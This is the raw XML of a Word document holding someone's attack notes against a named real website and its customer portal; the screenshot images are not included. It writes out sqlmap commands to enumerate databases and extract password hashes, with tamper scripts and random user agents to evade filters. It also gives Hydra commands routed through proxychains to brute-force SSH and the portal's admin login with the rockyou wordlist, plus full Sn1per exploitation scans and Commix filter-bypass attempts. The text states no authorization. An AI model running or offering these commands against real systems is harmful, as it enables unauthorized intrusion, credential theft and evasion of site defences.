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E73739" w14:textId="54B2F9B4" w:rsidR="00E74CE9" w:rsidRDefault="00B87FCF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00986062">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00986062">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00986062">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00986062">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00986062">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A18276" w14:textId="274355EB" w:rsidR="003F44C7" w:rsidRDefault="003F44C7">
      <w:r w:rsidRPr="003F44C7">
        <w:t>Use a Random User-Agent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="003F44C7">
        <w:t xml:space="preserve">--crawl=2 will automatically </w:t>
      </w:r>
      <w:r w:rsidRPr="003F44C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scan the whole website</w:t>
      </w:r>
      <w:r w:rsidRPr="003F44C7">
        <w:t xml:space="preserve"> for URLs with parameters.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BF07C9" w14:textId="3A670688" w:rsidR="00B87FCF" w:rsidRDefault="00B87FCF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87FCF">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87FCF">
        <w:t xml:space="preserve"> -u "www.plantedmeals.ca" --crawl=2 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87FCF">
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87FCF">
        <w:t xml:space="preserve"> --random-agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7B7934" w14:textId="539DDD6B" w:rsidR="00B87FCF" w:rsidRDefault="00B87FCF">
      <w:r w:rsidRPr="00B87FCF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A4435C0" wp14:editId="554019CF">
            <wp:extent cx="5731510" cy="4571365"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="2116031573" name="그림 1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31573" name="그림 1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7B54" w14:textId="77777777" w:rsidR="00B87FCF" w:rsidRDefault="00B87FCF"/>
    <w:p w14:paraId="0E98126F" w14:textId="77777777" w:rsidR="003F44C7" w:rsidRDefault="003F44C7">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4966DEC7" w14:textId="77777777" w:rsidR="003F44C7" w:rsidRDefault="003F44C7" w:rsidP="003F44C7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Extract Password Hashes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>To get passwords (if stored in a table)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DDBE69" w14:textId="7F505F59" w:rsidR="00B87FCF" w:rsidRDefault="00B87FCF" w:rsidP="003F44C7">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87FCF">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87FCF">
        <w:t xml:space="preserve"> -u "www.plantedmeals.ca" </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87FCF">
        <w:t>passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD7D890" w14:textId="649C5295" w:rsidR="00B87FCF" w:rsidRDefault="00B87FCF">
      <w:r w:rsidRPr="00B87FCF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C191796" wp14:editId="5152C613">
            <wp:extent cx="5731510" cy="2600325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="145664112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4112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1A4D" w14:textId="77777777" w:rsidR="00B87FCF" w:rsidRDefault="00B87FCF"/>
    <w:p w14:paraId="07AA52A9" w14:textId="4FA362F8" w:rsidR="003F44C7" w:rsidRDefault="003F44C7">
      <w:r>
        <w:t>Aggressive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan</w:t>
      </w:r>
      <w:r w:rsidR="00442FF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD814F9" w14:textId="5851A7E8" w:rsidR="003F44C7" w:rsidRDefault="00442FF1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00442FF1">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00442FF1">
        <w:t xml:space="preserve"> -u "http://plantedmeals.ca/" --forms --crawl=3 --risk=3 --level=5 --tamper=space2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00442FF1">
        <w:t>comment,charencode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00442FF1">
        <w:t xml:space="preserve"> --random-agent --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C424535" w14:textId="0681A73D" w:rsidR="00986062" w:rsidRDefault="001B2E3F">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r w:rsidRPr="001B2E3F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36F98A34" wp14:editId="163409D7">
            <wp:extent cx="5731510" cy="3989070"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="507589761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89761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CBE2" w14:textId="1006D05F" w:rsidR="00986062" w:rsidRDefault="00A56B6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E901367" w14:textId="263EB250" w:rsidR="00A56B6B" w:rsidRDefault="00715C32">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00715C32">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00715C32">
        <w:t xml:space="preserve"> hydra -L /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00715C32">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00715C32">
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00715C32">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00715C32">
        <w:t>/common_roots.txt -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00715C32">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00715C32">
        <w:t>/share/wordlists/rockyou.txt -t 1 -w 5 www.plantedmeals.ca ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414C7336" w14:textId="12C26127" w:rsidR="00715C32" w:rsidRDefault="00715C32">
      <w:r w:rsidRPr="00715C32">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4615CABE" wp14:editId="2AE941E3">
            <wp:extent cx="5731510" cy="1629410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="101878357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8357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BD6D" w14:textId="77777777" w:rsidR="00986062" w:rsidRDefault="00986062"/>
    <w:p w14:paraId="6A28BCA3" w14:textId="543F53C4" w:rsidR="009055AC" w:rsidRDefault="009055AC">
      <w:r w:rsidRPr="009055AC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C7D57BA" wp14:editId="048CCA81">
            <wp:extent cx="5731510" cy="2325370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="925662138" name="그림 1" descr="텍스트, 스크린샷, 소프트웨어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62138" name="그림 1" descr="텍스트, 스크린샷, 소프트웨어, 폰트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78FF" w14:textId="77777777" w:rsidR="009055AC" w:rsidRDefault="009055AC"/>
    <w:p w14:paraId="540D95D8" w14:textId="0E2BAD93" w:rsidR="00416EBE" w:rsidRDefault="002B625B">
      <w:r w:rsidRPr="002B625B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CAEA4BD" wp14:editId="03C4A7E8">
            <wp:extent cx="5731510" cy="2424430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1206944825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44825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B990" w14:textId="77777777" w:rsidR="002B625B" w:rsidRDefault="002B625B"/>
    <w:p w14:paraId="73A4E7D9" w14:textId="61AAD259" w:rsidR="00852FF5" w:rsidRDefault="00852FF5">
      <w:r w:rsidRPr="00852FF5">
        <w:lastRenderedPageBreak/>
        <w:t>hydra -l admin -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00852FF5">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00852FF5">
        <w:t>/share/wordlists/rockyou.txt portal.plantedmeals.ca https-post-form "/users/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00852FF5">
        <w:t>sign_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00852FF5">
        <w:t>in:email</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00852FF5">
        <w:t>=^USER^&amp;password=^PASS^:F=Invalid email or password."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0FC31A" w14:textId="52D294D7" w:rsidR="0069446A" w:rsidRDefault="00852FF5">
      <w:r w:rsidRPr="00852FF5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="111C72F3" wp14:editId="3AAE7BDD">
            <wp:extent cx="5731510" cy="3134995"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1561164497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64497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C929" w14:textId="15874D04" w:rsidR="006A0FB9" w:rsidRDefault="006A0FB9">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24FD1D2C" w14:textId="77777777" w:rsidR="00395AD3" w:rsidRDefault="00395AD3">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A40F30" w14:textId="02A23CA4" w:rsidR="00852FF5" w:rsidRDefault="006A0FB9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sn1per (automated reconnaissance and pen testing tool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FDFE93" w14:textId="77777777" w:rsidR="006A0FB9" w:rsidRDefault="006A0FB9" w:rsidP="006A0FB9">
      <w:r>
        <w:t>git clone https://github.com/1N3/Sn1per.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561C10D6" w14:textId="77777777" w:rsidR="006A0FB9" w:rsidRDefault="006A0FB9" w:rsidP="006A0FB9">
      <w:r>
        <w:t>cd Sn1per</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBECDDE" w14:textId="77777777" w:rsidR="006A0FB9" w:rsidRDefault="006A0FB9" w:rsidP="006A0FB9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> +x install.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEC9D09" w14:textId="6BEC753E" w:rsidR="006A0FB9" w:rsidRDefault="006A0FB9" w:rsidP="006A0FB9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ./install.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FEBF0F" w14:textId="537B2E2D" w:rsidR="006A0FB9" w:rsidRDefault="00116B2C" w:rsidP="006A0FB9">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> takes about 20-30 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F078E59" w14:textId="77777777" w:rsidR="00106AA2" w:rsidRDefault="009A511E" w:rsidP="006A0FB9"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sniper -t </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="004A335E">
          <w:rPr>
            <w:rStyle w:val="aa"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>www.plantedmeals.ca</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m full </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB53901" w14:textId="5AD30E3C" w:rsidR="006A0FB9" w:rsidRDefault="009A511E" w:rsidP="006A0FB9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(perform full detailed reconnaissance scan</w:t>
      </w:r>
      <w:r w:rsidR="00106AA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> including </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00106AA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00106AA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> port scan, web application scan, OSINT, exploit scan, passive reconnaissance, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00106AA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00106AA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack, exploitation, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00106AA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00106AA2">
        <w:t>…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693310B7" w14:textId="21FADF12" w:rsidR="009A511E" w:rsidRDefault="009A511E" w:rsidP="006A0FB9">
      <w:r w:rsidRPr="009A511E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="304C7574" wp14:editId="0A67675A">
            <wp:extent cx="5731510" cy="4777105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="10443761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761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4EE7" w14:textId="3D971C44" w:rsidR="009A511E" w:rsidRDefault="009A511E" w:rsidP="006A0FB9">
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t gives me vast amounts of scanning results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D365C35" w14:textId="7C7B21BB" w:rsidR="009A511E" w:rsidRDefault="00F3510F" w:rsidP="006A0FB9">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">his tool uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmap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nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart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whatweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00106AA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>obtain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484F2F9B" w14:textId="2A0F19EC" w:rsidR="00106AA2" w:rsidRDefault="0038021E" w:rsidP="006A0FB9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ommix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A5D6B2" w14:textId="5E112A7A" w:rsidR="0038021E" w:rsidRDefault="0038021E" w:rsidP="006A0FB9">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>imilar to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sqlmap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better to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51251AED" w14:textId="342D16AD" w:rsidR="0038021E" w:rsidRDefault="0038021E" w:rsidP="006A0FB9">
      <w:r w:rsidRPr="0038021E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40CBCC54" wp14:editId="093FAD10">
            <wp:extent cx="5731510" cy="3759200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="174850727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0727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694D" w14:textId="5563479F" w:rsidR="004C39D0" w:rsidRDefault="005B47EA">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ried many different methods for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7842529D" w14:textId="787ABC0C" w:rsidR="00BA39DD" w:rsidRDefault="00BA39DD">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r w:rsidRPr="00BA39DD">
        <w:t>Try encoding payloads to bypass filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB86D1F" w14:textId="12CAF45D" w:rsidR="005B47EA" w:rsidRDefault="00BA39DD">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r w:rsidRPr="00BA39DD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F0D5A25" wp14:editId="004194B7">
            <wp:extent cx="5731510" cy="2959100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1299540302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0302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1D1A" w14:textId="77777777" w:rsidR="00BA39DD" w:rsidRDefault="00BA39DD" w:rsidP="006A0FB9"/>
    <w:p w14:paraId="3EEA7A3A" w14:textId="1E0D927B" w:rsidR="00BA39DD" w:rsidRDefault="00BA39DD" w:rsidP="006A0FB9">
      <w:r w:rsidRPr="00BA39DD">
        <w:lastRenderedPageBreak/>
        <w:t>Intercept requests and modify headers to bypass security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E70D3E2" w14:textId="51AF005F" w:rsidR="00BA39DD" w:rsidRDefault="00BA39DD" w:rsidP="006A0FB9">
      <w:r w:rsidRPr="00BA39DD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41AE2C28" wp14:editId="4554C3FB">
            <wp:extent cx="5731510" cy="2269490"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="883532068" name="그림 1" descr="텍스트, 스크린샷, 소프트웨어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32068" name="그림 1" descr="텍스트, 스크린샷, 소프트웨어, 폰트이(가) 표시된 사진&#10;&#10;AI가 생성한 콘텐츠는 부정확할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DCE5" w14:textId="77777777" w:rsidR="00BA39DD" w:rsidRDefault="00BA39DD" w:rsidP="006A0FB9"/>
    <w:p w14:paraId="36D5AC71" w14:textId="77777777" w:rsidR="00BA39DD" w:rsidRDefault="00BA39DD" w:rsidP="006A0FB9"/>
    <w:p w14:paraId="4EAAD574" w14:textId="77777777" w:rsidR="00B926C1" w:rsidRDefault="00B926C1">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE978F3" w14:textId="4FF6EB39" w:rsidR="004C39D0" w:rsidRDefault="004C39D0" w:rsidP="006A0FB9">
      <w:r w:rsidRPr="004C39D0">
        <w:lastRenderedPageBreak/>
        <w:t>Sublist3r – Subdomain enumeration using public sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E0AE7A" w14:textId="425C5815" w:rsidR="004C39D0" w:rsidRDefault="004C39D0" w:rsidP="006A0FB9">
      <w:r w:rsidRPr="004C39D0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BABEA81" wp14:editId="3FA41485">
            <wp:extent cx="5731510" cy="3681730"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1449121988" name="그림 1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21988" name="그림 1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BB43" w14:textId="4C0BCFF5" w:rsidR="004C39D0" w:rsidRDefault="004C39D0">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE2092A" w14:textId="3195C35E" w:rsidR="009123B3" w:rsidRDefault="001E6117" w:rsidP="006A0FB9">
      <w:r w:rsidRPr="001E6117">
        <w:lastRenderedPageBreak/>
        <w:t>Fierce (DNS Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool for mapping networks</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6117">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE66D67" w14:textId="7D13C0E7" w:rsidR="001E6117" w:rsidRDefault="001E6117" w:rsidP="006A0FB9">
      <w:r w:rsidRPr="001E6117">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79DC5008" wp14:editId="24B94662">
            <wp:extent cx="5731510" cy="3482975"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="670252434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52434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1935" w14:textId="473D257F" w:rsidR="001E6117" w:rsidRDefault="001E6117" w:rsidP="006A0FB9">
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ot proper to use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394A5BE7" w14:textId="666CFBAF" w:rsidR="009B78F3" w:rsidRDefault="009B78F3">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B537CCC" w14:textId="1AD40813" w:rsidR="008006B6" w:rsidRDefault="008006B6" w:rsidP="009B78F3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008006B6">
        <w:lastRenderedPageBreak/>
        <w:t>Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008006B6">
        <w:t xml:space="preserve"> (Hidden Directory Scanning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AD7FFC" w14:textId="6ED4F8A3" w:rsidR="009B78F3" w:rsidRDefault="008006B6" w:rsidP="009B78F3">
      <w:r w:rsidRPr="008006B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="718F03A4" wp14:editId="274DCD98">
            <wp:extent cx="5731510" cy="3454400"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1311840459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40459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73F0" w14:textId="77777777" w:rsidR="008006B6" w:rsidRDefault="008006B6" w:rsidP="009B78F3"/>
    <w:p w14:paraId="5180F82F" w14:textId="5CFD4726" w:rsidR="008006B6" w:rsidRDefault="008006B6" w:rsidP="009B78F3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008006B6">
        <w:t>WPScan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008006B6">
        <w:t xml:space="preserve"> detected that www.plantedmeals.ca is not running WordPress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EC940A" w14:textId="50E3C414" w:rsidR="008006B6" w:rsidRDefault="008006B6" w:rsidP="009B78F3">
      <w:r w:rsidRPr="008006B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CE60E87" wp14:editId="0E8182D2">
            <wp:extent cx="5731510" cy="2950210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
